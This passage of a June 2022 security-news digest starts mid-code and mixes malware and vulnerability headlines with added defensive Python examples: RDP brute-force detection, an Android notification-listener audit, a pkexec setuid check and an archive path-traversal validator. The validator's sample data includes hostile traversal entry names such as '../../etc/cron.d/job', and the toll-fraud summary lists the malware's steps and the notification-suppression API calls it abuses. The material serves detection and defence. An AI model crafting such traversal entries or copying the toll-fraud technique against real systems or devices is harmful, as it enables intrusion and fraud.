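    {"time": "2022-05-10T02:14:27", "event_id": 4625, "logon_type": 10, "user": "backup", "src_ip": "203.0.113.7"},
    {"time": "2022-05-10T02:14:33", "event_id": 4625, "logon_type": 10, "user": "backup", "src_ip": "203.0.113.7"},
    {"time": "2022-05-10T02:14:41", "event_id": 4624, "logon_type": 10, "user": "backup", "src_ip": "203.0.113.7"},
    # A user mistyping a password once and then logging in: must not be flagged.
    {"time": "2022-05-10T08:03:12", "event_id": 4625, "logon_type": 10, "user": "j.doe", "src_ip": "198.51.100.22"},
    {"time": "2022-05-10T08:03:40", "event_id": 4624, "logon_type": 10, "user": "j.doe", "src_ip": "198.51.100.22"},
    # Network logons (type 3) from a service account: noisy, but not RDP, so out of scope here.
    *[{"time": f"2022-05-10T09:00:0{i}", "event_id": 4625, "logon_type": 3, "user": "svc_sql", "src_ip": "10.0.0.5"}
      for i in range(6)],
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def rdp_bruteforce_findings(events, threshold=5, window=timedelta(minutes=10)):
    """Flag source IPs with at least `threshold` failed RDP logons inside `window`,
    and record whether a successful RDP logon from that IP followed the burst."""
    by_ip = defaultdict(list)
    for e in sorted(events, key=_ts):
        if e["logon_type"] == 10:  # only RemoteInteractive (RDP) logons
            by_ip[e["src_ip"]].append(e)

    findings = []
    for ip, evs in by_ip.items():
        failures = [_ts(e) for e in evs if e["event_id"] == 4625]
        burst_end = None
        # Sliding window over the sorted failure timestamps.
        for i in range(len(failures)):
            j = i
            while j + 1 < len(failures) and failures[j + 1] - failures[i] <= window:
                j += 1
            if j - i + 1 >= threshold:
                burst_end = failures[j]
                break
        if burst_end is None:
            continue
        succeeded = any(e["event_id"] == 4624 and _ts(e) >= burst_end for e in evs)
        findings.append({
            "src_ip": ip,
            "failed_logons": len(failures),
            "users_tried": sorted({e["user"] for e in evs if e["event_id"] == 4625}),
            "success_after_burst": succeeded,  # burst followed by success is the case to act on first
        })
    return findings


if __name__ == "__main__":
    for finding in rdp_bruteforce_findings(SAMPLE_EVENTS):
        print(finding)
```

Password spraying across several account names from one address, as in the constructed sample, is what a per-IP count catches and a per-account lockout does not. The same logic runs unchanged over real 4624/4625 records once they are normalised into these fields; tune the threshold and window to the environment.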


                Toll fraud malware disables your WiFi to force premium subscriptions

                exploits
                2022-06-30 https://www.bleepingcomputer.com/news/security/toll-fraud-malware-disables-your-wifi-to-force-premium-subscriptions/
                Microsoft is warning that toll fraud malware is one of the most prevalent threats on Android and that it is evolving with features that allow automatic subscription to premium services. [...] "

                Autosummary: Microsoft identified several steps in the process, which typically happens with users completely unaware:
                • Disable the Wi-Fi connection or wait for the user to switch to a mobile network
                • Silently navigate to the subscription page
                • Auto-click the subscription button
                • Intercept the OTP (if applicable)
                • Send the OTP to the service provider (if applicable)
                • Cancel the SMS notifications (if applicable)
                The malware starts by collecting data on the subscriber’s country and mobile network, for which Android requires no permission from the user. “Since API level 18, an application that extends the NotificationListenerService is authorized to suppress notifications triggered from other applications” - Microsoft. Malware developers have a subset of three API calls they can abuse to silence SMS notifications from other applications:
                • cancelAllNotifications() to inform the notification manager to dismiss all notifications
                • cancelNotification(String key) to inform the notification manager to dismiss a single notification
                • cancelNotifications(String[] keys) to inform the notification manager to dismiss multiple notifications at once
                Developers of toll fraud malware also implement mechanisms to keep the malicious behavior as discreet as possible. "
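The suppression technique above only works for an app the user has granted notification access, so the practical check on a device is: which packages currently hold that access? The following is an added example, not code from Microsoft's report: it parses the value returned by `adb shell settings get secure enabled_notification_listeners` and lists packages outside an allowlist. The sample value is constructed, the ':'-separated `package/class` layout (with a leading dot meaning a class relative to the package, and "null" when empty) is assumed, and the allowlisted package names are placeholders.

```python
# Constructed output of `adb shell settings get secure enabled_notification_listeners`.
# Assumed layout: ':'-separated flattened component names (package/class); a class that
# starts with '.' is relative to its package; the value is the string "null" when empty.
SAMPLE_SETTING = (
    "com.android.systemui/com.android.systemui.statusbar.NotificationListener:"
    "com.example.smartwatch/.sync.WearListenerService:"
    "com.cheap.wallpapers/com.cheap.wallpapers.NotifService"
)

# Packages expected to hold notification access on a managed device (placeholder allowlist).
EXPECTED_LISTENERS = {"com.android.systemui", "com.example.smartwatch"}


def parse_listeners(setting):
    """Split the setting into (package, fully qualified class) pairs."""
    if setting is None or setting.strip() in ("", "null"):
        return []
    pairs = []
    for item in setting.strip().split(":"):
        if not item:
            continue
        pkg, _, cls = item.partition("/")
        if cls.startswith("."):
            cls = pkg + cls  # expand the relative class name
        pairs.append((pkg, cls))
    return pairs


def unexpected_listeners(setting, allowlist=EXPECTED_LISTENERS):
    """Listeners whose package is not allowlisted. Each of these can call
    cancelNotification()/cancelAllNotifications() against other apps' notifications,
    including the carrier SMS that confirms a subscription."""
    return [(pkg, cls) for pkg, cls in parse_listeners(setting) if pkg not in allowlist]


if __name__ == "__main__":
    for pkg, cls in unexpected_listeners(SAMPLE_SETTING):
        print(f"review notification access held by {pkg} ({cls})")
```

Feed the function the real setting value from a device under investigation; a wallpaper or utility app with a NotificationListenerService is the kind of hit worth pulling the APK for.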


                Ocient collaborates with Carahsoft to accelerate digital transformation for U.S. government agencies

                government
                2022-06-30 https://www.helpnetsecurity.com/2022/07/01/ocient-carahsoft/

                Ocient announced it has partnered with Carahsoft to bring hyperscale data warehouse, analytics and machine learning capabilities to U.S. federal, state/local governments and higher education organizations. Carahsoft will serve as the U.S. government distributor for Ocient leveraging Carahsoft’s reseller partners and contracts including NASA Solutions for Enterprise-Wide Procurement (SEWP) V, Information Technology Enterprise Solutions – Software 2 (ITES- SW2) and OMNIA Partners, the nation’s largest cooperative purchasing organization for the public sector. In tandem with … More

                The post Ocient collaborates with Carahsoft to accelerate digital transformation for U.S. government agencies appeared first on Help Net Security.

                "

                Autosummary: Government use cases powered by Ocient’s hyperscale data analytics solutions include:
                • Lawful intercept and lawful intelligence
                • Cybersecurity and anomaly detection
                • Log and sensor data collection and analysis
                • Weather and climate change study and reporting
                • Geospatial calculation and analysis
                Ocient’s hyperscale data analytics solutions can be deployed either on-premises, in the cloud or as a managed service in the OcientCloud to consolidate multiple workloads on a single platform for maximum efficiency and security. "


                Korean cybersecurity agency released a free decryptor for Hive ransomware

                exploits ransomware ciber
                2022-06-30 https://securityaffairs.co/wordpress/132770/malware/hive-ransomware-decryptor.html

                Good news for the victims of the Hive ransomware: the South Korean cybersecurity agency KISA has released a free decryptor for versions v1 through v4. “The Korea Internet & Security Agency (KISA) is distributing […]

                The post Korean cybersecurity agency released a free decryptor for Hive ransomware appeared first on Security Affairs.

                "

                Autosummary: The results of the tests demonstrated the efficiency of the method: a master key recovered to 92% succeeded in decrypting approximately 72% of the files, a master key restored to 96% decrypted approximately 82% of the files, and a master key restored to 98% decrypted approximately 98% of the files. "


                Ukraine targeted by almost 800 cyberattacks since the war started

                ciber
                2022-06-30 https://www.bleepingcomputer.com/news/security/ukraine-targeted-by-almost-800-cyberattacks-since-the-war-started/
                Ukrainian government and private sector organizations have been the target of 796 cyberattacks since the start of the war on February 24, 2022, when Russia invaded Ukraine. [...] "

                Autosummary: The Microsoft Threat Intelligence Center (MSTIC) also observed threat groups linked to the GRU, SVR, and FSB Russian intelligence services (e.g., APT28, Sandworm, Gamaredon, EnergeticBear, Turla, DEV-0586, and UNC2452/2652) intensifying their attacks against Ukraine and its allies starting in March 2022. "


                How to get Fortune 500 cybersecurity without the hefty price tag

                ciber
                2022-06-30 https://grahamcluley.com/feed-sponsor-solcyber-2/
                Graham Cluley Security News is sponsored this week by the folks at SolCyber. Thanks to the great team there for their support! If the bad guys don’t discriminate when it comes to who they are attacking, how can your business settle for anything less than the very best security? SolCyber has brought to market a … Continue reading "How to get Fortune 500 cybersecurity without the hefty price tag" "

                Autosummary: "


                Skyhigh Security collaborates with Gotara to increase diversity in the cybersecurity sector

                ciber
                2022-06-30 https://www.helpnetsecurity.com/2022/07/01/skyhigh-security-gotara/

                Skyhigh Security announced it has partnered with Gotara, a global career growth platform for women in STEM+. The program launched internally to Skyhigh Security employees this month and is a key element of the company’s leadership development program. Through the partnership, Gotara will offer personalized and confidential career advice and support guided by STAR Program advisors, designed to mentor and upskill individuals to create future leaders. Cybersecurity is currently a male-dominated field. According to a … More

                The post Skyhigh Security collaborates with Gotara to increase diversity in the cybersecurity sector appeared first on Help Net Security.

                "

                Autosummary: “At Skyhigh Security, we are focused on anticipating the market and responding quickly to the ever-changing security landscape in a way that reduces complexity,” said Kristen Wynne, Head of People Success at Skyhigh Security. "


                Siemens and NVIDIA join forces to enable industrial metaverse

                industry
                2022-06-30 https://www.helpnetsecurity.com/2022/07/01/siemens-nvidia/

                Siemens and NVIDIA announced an expansion of their partnership to enable the industrial metaverse and increase use of AI-driven digital twin technology that will help bring industrial automation to a new level. As a first step in this collaboration, the companies plan to connect Siemens Xcelerator, the open digital business platform, and NVIDIA Omniverse, a platform for 3D-design and collaboration. This will enable an industrial metaverse with physics-based digital models from Siemens and real-time AI … More

                The post Siemens and NVIDIA join forces to enable industrial metaverse appeared first on Help Net Security.

                "

                Autosummary: As a first step in this collaboration, the companies plan to connect Siemens Xcelerator, the open digital business platform, and NVIDIA Omniverse, a platform for 3D-design and collaboration. "


                Colt SASE Gateway protects hybrid workforce from malware and threats

                exploits
                2022-06-29 https://www.helpnetsecurity.com/2022/06/29/colt-sase-gateway/

                Colt Technology Services’ customers now have access to an integrated full Secure Access Service Edge (SASE) solution that brings together SD WAN and SSE features, with the launch of its new Colt SASE Gateway solution. Designed for global enterprise companies, the Colt Gateway solution is based on Versa SASE which includes Versa Secure Web Gateway, a secure web access solution that offers organizations protection from malware and threats, and instant insight for policy management, along … More

                The post Colt SASE Gateway protects hybrid workforce from malware and threats appeared first on Help Net Security.

                "

                Autosummary: "


                CISA Warns of Active Exploitation of "PwnKit" Linux Vulnerability in the Wild

                exploits
                2022-06-29 https://thehackernews.com/2022/06/cisa-warns-of-active-exploitation-of.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) this week moved to add a Linux vulnerability dubbed PwnKit to its Known Exploited Vulnerabilities Catalog, citing evidence of active exploitation. The issue, tracked as CVE-2021-4034 (CVSS score: 7.8), came to light in January 2022 and concerns a case of local privilege escalation in polkit’s pkexec utility, which allows an "

                Autosummary: "


                Amazon fixes high-severity vulnerability in Android Photos app

                exploits
                2022-06-29 https://www.bleepingcomputer.com/news/security/amazon-fixes-high-severity-vulnerability-in-android-photos-app/
                Amazon has confirmed and fixed a vulnerability in its Photos app for Android, which has been downloaded over 50 million times on the Google Play Store. [...] "

                Autosummary: "


                Microsoft fixes bug that let hackers hijack Azure Linux clusters

                exploits
                2022-06-29 https://www.bleepingcomputer.com/news/security/microsoft-fixes-bug-that-let-hackers-hijack-azure-linux-clusters/
                Microsoft has fixed a container escape vulnerability in the Service Fabric (SF) application hosting platform that would allow threat actors to escalate privileges to root, gain control of the host node, and compromise the entire SF Linux cluster. [...] "

                Autosummary: It also powers many Microsoft products, including but not limited to Azure SQL Database, Azure Cosmos DB, Microsoft Intune, Azure Event Hubs, Azure IoT Hub, Dynamics 365, Skype for Business, Cortana, Microsoft Power BI, and multiple core Azure services. "


                Codenotary SBOM Operator for Kubernetes provides continuously updated info on software supply chain

                ransomware
                2022-06-29 https://www.helpnetsecurity.com/2022/06/29/codenotary-sbom-operator-for-kubernetes/

                Codenotary launched SBOM Operator for Kubernetes in both its open source Community Attestation Service, as well as Codenotary’s Trustcenter, the company’s flagship product, that mitigates the risk of software supply chain attacks by tracking all software and software dependencies running in Kubernetes. Codenotary provides the easiest way to generate SBOMs (Software Bill of Materials) of running container images and maintaining up-to-date records of all builds, and dependencies. This allows for immediate risk mitigation in the … More

                The post Codenotary SBOM Operator for Kubernetes provides continuously updated info on software supply chain appeared first on Help Net Security.

                "

                Autosummary: "


                New UnRAR Vulnerability Could Let Attackers Hack Zimbra Webmail Servers

                exploits
                2022-06-29 https://thehackernews.com/2022/06/new-unrar-vulnerability-could-let.html
                A new security vulnerability has been disclosed in RARlab’s UnRAR utility that, if successfully exploited, could permit a remote attacker to execute arbitrary code on a system that relies on the binary. The flaw, assigned the identifier CVE-2022-30333, relates to a path traversal vulnerability in the Unix versions of UnRAR that can be triggered upon extracting a maliciously crafted RAR archive. "

                Autosummary: "
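The item describes a path traversal triggered by extracting a crafted archive on Unix. The general defence for any archive extractor (RAR, ZIP, tar alike) is to decide where an entry will land before writing it, after normalising every separator the extractor might later honour. The block below is an added example of that check, not UnRAR's code and not a description of how CVE-2022-30333 itself works; the entry names and destination directory are constructed.

```python
import posixpath

# Constructed entry names of the kind a hostile archive might carry (not from the CVE write-up).
SAMPLE_MEMBERS = [
    "docs/readme.txt",
    "a/./b/../c",
    "../../etc/cron.d/job",
    "..\\..\\etc\\cron.d\\job",  # backslashes, which a Unix extractor may later rewrite as '/'
    "a/../../b",
    "/etc/cron.d/job",
    "C:\\Windows\\win.ini",
]


def is_safe_member_path(dest_dir, member_name):
    """True if extracting `member_name` under `dest_dir` cannot land outside `dest_dir`.

    Both separators are normalised *before* any decision, so the name is judged on the
    path the extractor will actually create, not on the raw bytes in the archive header."""
    normalised = member_name.replace("\\", "/")
    # Absolute paths and drive-letter paths leave dest_dir outright.
    if normalised.startswith("/") or (len(normalised) > 1 and normalised[1] == ":"):
        return False
    # Collapse '.' and '..' segments; normpath keeps any leading '..' that still escapes.
    collapsed = posixpath.normpath(normalised)
    if collapsed == ".." or collapsed.startswith("../"):
        return False
    # Final position check: the joined path must still sit under dest_dir.
    root = posixpath.normpath(dest_dir)
    target = posixpath.normpath(posixpath.join(root, collapsed))
    return target == root or target.startswith(root + "/")


def unsafe_members(dest_dir, member_names):
    """Entries that must be refused before anything is written to disk."""
    return [m for m in member_names if not is_safe_member_path(dest_dir, m)]


if __name__ == "__main__":
    for name in unsafe_members("/srv/extract", SAMPLE_MEMBERS):
        print("refuse:", name)
```

Two caveats a reviewer of an extractor would add: symbolic-link entries need the same check applied to their link target, and to the final resolved path of every later entry that could be written through them; and the check must run on the exact string the write call will receive, so any separator or encoding conversion has to happen before, not after, the comparison.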


                New "FabricScape" Bug in Microsoft Azure Service Fabric Impacts Linux Workloads

                exploits industry
                2022-06-29 https://thehackernews.com/2022/06/new-fabricscape-bug-in-microsoft-azure.html
                Cybersecurity researchers from Palo Alto Networks Unit 42 disclosed details of a new security flaw affecting Microsoft’s Service Fabric that could be exploited to obtain elevated permissions and seize control of all nodes in a cluster. The issue, which has been dubbed FabricScape (CVE-2022-30137), could be exploited on containers that are configured to have runtime access. It has been remediated "

                Autosummary: "The vulnerability enables a bad actor, with access to a compromised container, to escalate privileges and gain control of the resource’s host SF node and the entire cluster," Microsoft said as part of the coordinated disclosure process. "


                Thunderbird 102 released with highly anticipated features, bug fixes

                exploits
                2022-06-29 https://www.bleepingcomputer.com/news/software/thunderbird-102-released-with-highly-anticipated-features-bug-fixes/
                Mozilla has announced the release of Thunderbird 102, one of the world’s most popular open-source email clients with an estimated userbase of over 25 million. [...] "

                Autosummary: Import-Export function in Thunderbird 102 (Mozilla) Another important new feature is the Spaces Toolbar, which gives users a quick way to switch between Mail, Address Book, Calendar, Tasks, and Chat. "


                Ukraine arrests cybercrime gang operating over 400 phishing sites

                financial
                2022-06-29 https://www.bleepingcomputer.com/news/security/ukraine-arrests-cybercrime-gang-operating-over-400-phishing-sites/
                The Ukrainian cyberpolice force arrested nine members of a criminal group that operated over 400 phishing websites crafted to appear like legitimate EU portals offering financial assistance to Ukrainians. [...] "

                Autosummary: "


                Microsoft Azure FabricScape bug let hackers hijack Linux clusters

                exploits
                2022-06-29 https://www.bleepingcomputer.com/news/security/microsoft-azure-fabricscape-bug-let-hackers-hijack-linux-clusters/
                Microsoft has fixed a container escape bug dubbed FabricScape in the Service Fabric (SF) application hosting platform that let threat actors escalate privileges to root, gain control of the host node, and compromise the entire SF Linux cluster. [...] "

                Autosummary: It also powers many Microsoft products, including but not limited to Azure SQL Database, Azure Cosmos DB, Microsoft Intune, Azure Event Hubs, Azure IoT Hub, Dynamics 365, Skype for Business, Cortana, Microsoft Power BI, and multiple core Azure services. "


                New YTStealer Malware Aims to Hijack Accounts of YouTube Content Creators

                exploits
                2022-06-29 https://thehackernews.com/2022/06/new-ytstealer-malware-aims-to-hijack.html
                Cybersecurity researchers have documented a new information-stealing malware that targets YouTube content creators by plundering their authentication cookies. Dubbed "YTStealer" by Intezer, the malicious tool is believed to be sold as a service on the dark web, with it distributed using fake installers that also drop RedLine Stealer and Vidar. "What sets YTStealer aside from other "

                Autosummary: "


                New YTStealer malware steals accounts from YouTube Creators

                exploits
                2022-06-29 https://www.bleepingcomputer.com/news/security/new-ytstealer-malware-steals-accounts-from-youtube-creators/
                A new information-stealing malware named YTStealer is targeting YouTube content creators and attempting to steal their authentication tokens and hijack their channels. [...] "

                Autosummary: If it’s valid, YTStealer also collects additional information such as:
                • YouTube channel name
                • Subscriber count
                • Creation date
                • Monetization status
                • Official artist channel status
                Launching the web browser in headless mode makes the whole operation stealthy to the victim, who wouldn’t notice anything strange unless they scrutinize their running processes. "


                CISA warns of hackers exploiting PwnKit Linux vulnerability

                exploits
                2022-06-29 https://www.bleepingcomputer.com/news/security/cisa-warns-of-hackers-exploiting-pwnkit-linux-vulnerability/
                The Cybersecurity and Infrastructure Security Agency (CISA) has added a high-severity Linux vulnerability known as PwnKit to its list of bugs exploited in the wild. [...] "

                Autosummary: "
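Both PwnKit items on this page (the Hacker News and BleepingComputer reports of CISA's KEV addition) describe a local privilege escalation in polkit's pkexec, which is a setuid-root binary. The quickest triage on a fleet is therefore to find pkexec binaries that still carry the setuid bit, and the widely published stopgap while packages are updated is to clear that bit. The following is an added example, not code from polkit, CISA or either article; the install paths are assumptions for common distributions, and a setuid hit means "verify the package version", not "vulnerable", since a patched pkexec is setuid too.

```python
import os
import stat

# Common install locations for pkexec (assumed; adjust for your distribution).
PKEXEC_PATHS = ("/usr/bin/pkexec", "/usr/lib/policykit-1/pkexec")


def setuid_status(path):
    """Describe one binary: is it present, does it carry the setuid bit, is it root-owned?"""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return {"path": path, "present": False, "setuid": False, "root_owned": False}
    return {
        "path": path,
        "present": True,
        "setuid": bool(st.st_mode & stat.S_ISUID),
        "root_owned": st.st_uid == 0,
    }


def exposed_pkexec(paths=PKEXEC_PATHS):
    """Return the pkexec binaries that still carry the setuid bit.

    PwnKit needs a setuid pkexec. This does not distinguish a patched from an unpatched
    binary, so treat a hit as 'confirm the polkit package level', not as 'exploitable'."""
    return [s for s in map(setuid_status, paths) if s["present"] and s["setuid"]]


def strip_setuid(path):
    """Stopgap mitigation published alongside the disclosure: drop the setuid bit (chmod 0755).

    Returns the new permission bits. pkexec stops working for unprivileged users until the
    package is patched and the bit restored, so this is an interim measure, not the fix."""
    mode = stat.S_IMODE(os.stat(path).st_mode) & ~stat.S_ISUID
    os.chmod(path, mode)
    return mode


if __name__ == "__main__":
    hits = exposed_pkexec()
    if not hits:
        print("no setuid pkexec found at the checked paths")
    for h in hits:
        owner = "root" if h["root_owned"] else "non-root"
        print(f"{h['path']}: setuid, owned by {owner} - confirm polkit is patched for CVE-2021-4034")
```

The version string that proves a patch is installed differs per distribution (backported fixes keep the upstream version number), which is why the check stops at the setuid bit and leaves the package query to your package manager.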


                Walmart denies being hit by Yanluowang ransomware attack

                exploits ransomware
                2022-06-29 https://www.bleepingcomputer.com/news/security/walmart-denies-being-hit-by-yanluowang-ransomware-attack/
                American retailer Walmart has denied being hit with a ransomware attack by the Yanluowang gang after the hackers claimed to encrypt thousands of computers. [...] "

                Autosummary: "


                Cisco collaborates with GDIT to deliver private 5G solutions for the government sector

                government
                2022-06-29 https://www.helpnetsecurity.com/2022/06/30/cisco-gdit/

                Cisco announced its expanded relationship with General Dynamics Information Technology (GDIT), a business unit of General Dynamics, to deliver Cisco Private 5G services to a broad set of government entities. GDIT has been providing comprehensive IT solutions to Federal, State, and Local governments for more than three decades, and has partnered with Cisco since the 1980s to deliver cutting-edge innovation. Combining GDIT’s extensive background and close understanding of use cases for government agencies and its … More

                The post Cisco collaborates with GDIT to deliver private 5G solutions for the government sector appeared first on Help Net Security.

                "

                Autosummary: "


                Cloud Security Alliance and Cyber Risk Institute develop CCM addendum for the financial sector

                financial
                2022-06-29 https://www.helpnetsecurity.com/2022/06/30/cloud-security-alliance-cyber-risk-institute/

                The Cloud Security Alliance (CSA) announced that it has partnered with the Cyber Risk Institute (CRI) to develop an addendum to its Cloud Controls Matrix (CCM), written specifically for the financial sector. For many years, the cloud was a tempting, albeit forbidden, fruit for financial institutions. However, as cloud service providers’ (CSP) security measures have improved to accommodate most, if not all, of the financial sector’s regulatory requirements, increasing numbers of financial institutions are now … More

                The post Cloud Security Alliance and Cyber Risk Institute develop CCM addendum for the financial sector appeared first on Help Net Security.

                "

                Autosummary: However, as cloud service providers’ (CSP) security measures have improved to accommodate most, if not all, of the financial sector’s regulatory requirements, increasing numbers of financial institutions are now looking to extend their rate of cloud adoption. "


                APT Hackers Targeting Industrial Control Systems with ShadowPad Backdoor

                industry
                2022-06-29 https://thehackernews.com/2022/06/apt-hackers-targeting-industrial.html
                Entities located in Afghanistan, Malaysia, and Pakistan are in the crosshairs of an attack campaign that targets unpatched Microsoft Exchange Servers as an initial access vector to deploy the ShadowPad malware. Russian cybersecurity firm Kaspersky, which first detected the activity in mid-October 2021, attributed it to a previously unknown Chinese-speaking threat actor. Targets include "

                Autosummary: "However, those systems can be a valuable source of highly confidential information and may provide the attackers with a backdoor to other, more secured, areas of infrastructures." "


                Threat actors increasingly use third parties to run their scams

                financial
                2022-06-28 https://www.helpnetsecurity.com/2022/06/28/threat-actors-impersonate-vendors/

                Abnormal Security released new research that showcases a rising trend in financial supply chain compromise as threat actors impersonate vendors more than ever before. In January 2022, the number of business email compromise (BEC) attacks impersonating external third parties surpassed those impersonating internal employees for the first time and has continued to exceed traditional internal impersonations in each month since. In May 2022, external, third-party impersonation made up 52% of all BEC attacks seen by … More

                The post Threat actors increasingly use third parties to run their scams appeared first on Help Net Security.

                "

                Autosummary: Said Hassold, “This shift to financial supply chain attacks is another important milestone in the evolution of threat actors from low-value, low-impact threats like spam to targeted high-value, high-impact attacks. "


                Peer Software partners with Pulsar Security to help enterprise customers combat ransomware attacks

                exploits ransomware
                2022-06-28 https://www.helpnetsecurity.com/2022/06/28/peer-software-pulsar-security/

                Peer Software announced the formation of a strategic alliance with Pulsar Security. Through the alliance, Peer Software will leverage Pulsar Security’s team of cyber security experts to continuously monitor and analyze emerging and evolving ransomware and malware attack patterns on unstructured data. PeerGFS, an enterprise-class software solution that eases the deployment of a modern distributed file system across multi-site, on-premises and cloud storage, will utilize these attack patterns to enable an additional layer of cyber … More

                The post Peer Software partners with Pulsar Security to help enterprise customers combat ransomware attacks appeared first on Help Net Security.

                "

                Autosummary: "


                Detection, isolation, and negotiation: Improving your ransomware preparedness and response

                exploits ransomware
                2022-06-28 https://www.helpnetsecurity.com/2022/06/28/improving-ransomware-preparedness/

                The risks presented by ransomware and cyber extortion events have likely found a place in your own security team’s discussions, and rightfully so. Ransomware attacks have proliferated in the last decade. The numbers are staggering if not overwhelming, and make it abundantly clear that ransomware attacks are not a threat that any organization, however big or small and across industries, can afford to ignore. It follows, then, that proactively protecting company assets and mitigating cyber … More

                The post Detection, isolation, and negotiation: Improving your ransomware preparedness and response appeared first on Help Net Security.

                "

                Autosummary: Further pressure: there are other means threat actors use to add pressure to negotiations outside of the ransomware attack itself, including:
                • Implementing DDoS attacks
                • Emailing employees directly about the attack
                • Claiming to have data they have not actually exfiltrated to make the situation seem more dire
                • Contacting executives or clients of the victims to make them aware of the attack
                • Posting sensitive PII on public-facing forums or social media
                • Leaving backdoors that make it possible for the ransomware attackers to carry out a second attack against the same organization
                Being the victim of a cyber extortion attack is stressful and challenging. Without a threat readiness and response plan in place, the damage of a ransomware or cyber extortion event could reverberate across your organization, resulting in data loss, service inaccessibility, operational interruptions, loss of trust and competitive market advantage, and other costly and lasting repercussions. It is always advisable to use a professional who is familiar with threat actor engagement, ransomware attacks, and the legal obligations of ransomware victims; knowledge of current cyber extortion trends, threat actor TTPs, and threat actor groups is also important. "


                New Android Banking Trojan "Revive" Targeting Users of Spanish Financial Services

                financial exploits
                2022-06-28 https://thehackernews.com/2022/06/new-android-banking-trojan-revive.html
                A previously unknown Android banking trojan has been discovered in the wild, targeting users of the Spanish financial services company BBVA. Said to be in its early stages of development, the malware — dubbed Revive by Italian cybersecurity firm Cleafy — was first observed on June 15, 2022 and distributed by means of phishing campaigns. "The name Revive has been chosen since one of the "

                Autosummary: "


                OpenSSL to Release Security Patch for Remote Memory Corruption Vulnerability

                exploits
                2022-06-28 https://thehackernews.com/2022/06/openssh-to-release-security-patch-for.html
                The latest version of the OpenSSL library has been discovered as susceptible to a remote memory-corruption vulnerability on select systems. The issue has been identified in OpenSSL version 3.0.4, which was released on June 21, 2022, and impacts x64 systems with the AVX-512 instruction set. OpenSSL 1.1.1 as well as OpenSSL forks BoringSSL and LibreSSL are not affected. Security "

                Autosummary: "


                Log4Shell Vulnerability Targeted in VMware Servers to Exfiltrate Data

                exploits
                2022-06-28 https://threatpost.com/log4shell-targeted-vmware-data/180072/
                CISA warns that threat actors are ramping up attacks against the unpatched Log4Shell vulnerability in VMware servers. "

                Autosummary: According to CISA, in one instance the advanced persistent threat (APT) actor compromises the victim’s internal network, procures a disaster recovery network, and extracts sensitive information. "


                New ZuoRAT malware targets SOHO routers in North America, Europe

                exploits
                2022-06-28 https://www.bleepingcomputer.com/news/security/new-zuorat-malware-targets-soho-routers-in-north-america-europe/
                A newly discovered multistage remote access trojan (RAT) dubbed ZuoRAT has been used to target remote workers via small office/home office (SOHO) routers across North America and Europe undetected since 2020. [...] "

                Autosummary: ZuoRAT campaign (Lumen Black Lotus Labs) "The capabilities demonstrated in this campaign – gaining access to SOHO devices of different makes and models, collecting host and LAN information to inform targeting, sampling and hijacking network communications to gain potentially persistent access to in-land devices and intentionally stealth C2 infrastructure leveraging multi-stage siloed router to router communications – points to a highly sophisticated actor that we hypothesize has been living undetected on the edge of targeted networks for years," the researchers added. "


                City worker loses USB stick containing data on every resident after day of drinking

                government
                2022-06-28 https://blog.malwarebytes.com/privacy-2/2022/06/city-worker-loses-usb-stick-containing-data-on-every-resident-after-day-of-drinking/

                We take a look at reports of a USB drive containing data on all 460k residents of a city in Japan, and how encryption helped lessen the risk.

                The post City worker loses USB stick containing data on every resident after day of drinking appeared first on Malwarebytes Labs.

                "

                Autosummary: Data on the USB drive included names, gender, birthdays, and addresses. So, providing they used a good password, if someone finds the USB drive and plugs it into a computer, they won’t be able to just open up the files and view the contents. Posted: June 28, 2022. "


                Researchers uncover ZuoRAT malware targeting home-office routers

                exploits
                2022-06-28 https://www.helpnetsecurity.com/2022/06/28/zuorat-malware-routers/

                Black Lotus Labs discovered a new remote access trojan (RAT) called ZuoRAT, which targets remote workers via their small office/home office (SOHO) devices, including models from ASUS, Cisco, DrayTek and NETGEAR. Overview of campaign elements ZuoRAT is part of a complex campaign that went undetected for nearly two years. The tactics, techniques and procedures (TTPs) that analysts observed bear the markings of what is likely a nation-state threat actor. The campaign included ZuoRAT – a … More

                The post Researchers uncover ZuoRAT malware targeting home-office routers appeared first on Help Net Security.

                "

                Autosummary: Black Lotus Labs discovered a new remote access trojan (RAT) called ZuoRAT, which targets remote workers via their small office/home office (SOHO) devices, including models from ASUS, Cisco, DrayTek and NETGEAR. "


                ZuoRAT Malware Hijacking Home-Office Routers to Spy on Targeted Networks

                exploits
                2022-06-28 https://thehackernews.com/2022/06/zuorat-malware-hijacking-home-office.html
                A never-before-seen remote access trojan dubbed ZuoRAT has been singling out small office/home office (SOHO) routers as part of a sophisticated campaign targeting North American and European networks. The malware "grants the actor the ability to pivot into the local network and gain access to additional systems on the LAN by hijacking network communications to maintain an undetected foothold," "

                Autosummary: "


                Mitel VoIP Bug Exploited in Ransomware Attacks

                exploits ransomware
                2022-06-28 https://threatpost.com/mitel-voip-bug-exploited/180079/
                Researchers warn threat actors are using a novel remote code execution exploit to gain initial access to victims’ environments. "

                Autosummary: This included the initial undocumented exploit used to compromise the device, the tools subsequently downloaded by the threat actor to the device, and even evidence of specific anti-forensic measures taken by the threat actor,” said Bennett. “The device was taken offline and imaged for further analysis, leading to the discovery of a novel remote code execution exploit used by the threat actor to gain initial access to the environment,” Patrick Bennett wrote in a blog post. "


                LockBit 3.0 introduces important novelties, including a bug bounty program

                exploits ransomware
                2022-06-28 https://securityaffairs.co/wordpress/132701/cyber-crime/lockbit-3-0.html

                The LockBit ransomware operators released LockBit 3.0 with important novelties, including a bug bounty program and Zcash payments. The Lockbit ransomware operation has released LockBit 3.0, which has important novelties such as a bug bounty program, Zcash payment, and new extortion tactics. The gang has been active since at least 2019 and today it is […]

                The post LockBit 3.0 introduces important novelties, including a bug bounty program appeared first on Security Affairs.

                "

                Autosummary: "


                MITRE shares this year's list of most dangerous software bugs

                exploits
                2022-06-28 https://www.bleepingcomputer.com/news/security/mitre-shares-this-years-list-of-most-dangerous-software-bugs/
                MITRE shared this year's top 25 most common and dangerous weaknesses impacting software throughout the previous two calendar years. [...] "

                Autosummary: +4
                Rank | CWE ID | Name | Score | CVEs in KEV | Rank change vs. 2021
                12 | CWE-502 | Deserialization of Untrusted Data | 6.68 | 7 | +1
                13 | CWE-190 | Integer Overflow or Wraparound | 6.53 | 2 | -1
                14 | CWE-287 | Improper Authentication | 6.35 | 4 | 0
                15 | CWE-798 | Use of Hard-coded Credentials | 5.66 | 0 | +1
                16 | CWE-862 | Missing Authorization | 5.53 | 1 | +2
                17 | CWE-77 | Improper Neutralization of Special Elements used in a Command ("Command Injection") | 5.42 | 5 | +8
